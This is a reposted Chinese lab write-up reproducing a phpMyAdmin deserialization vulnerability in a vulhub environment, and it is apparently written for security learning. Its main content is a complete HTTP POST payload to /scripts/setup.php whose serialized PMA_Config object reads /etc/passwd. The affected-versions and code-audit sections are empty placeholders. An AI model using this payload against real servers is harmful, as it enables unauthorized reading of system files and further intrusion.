码上快乐

相关内容   简体   繁体

phpmyadmin反序列化漏洞(WooYun-2016-199433)

本文转载自  查看原文  2020-03-27 09:51  1017    反序列化漏洞

简介

环境复现:https://github.com/vulhub/vulhub

线上平台:榆林学院内可使用协会内部的网络安全实验平台

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具

影响版本

1 1

代码审计

1

利用过程

http://192.168.52.129:8080/scripts/setup.php

 

发送如下数据包,即可读取/etc/passwd

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 反序列化漏洞整理 Python反序列化漏洞 [原题复现+审计][0CTF 2016] WEB piapiapia(反序列化、数组绕过)[改变序列化长度,导致反序列化漏洞] Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现 Apache Shiro 反序列化漏洞(Shiro-550 CVE-2016-4437) Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现 复现Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) Apache Shiro 反序列化漏洞复现550/721(CVE-2016-4437) CVE-2016-4437 Apache Shiro 1.2.4反序列化漏洞
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM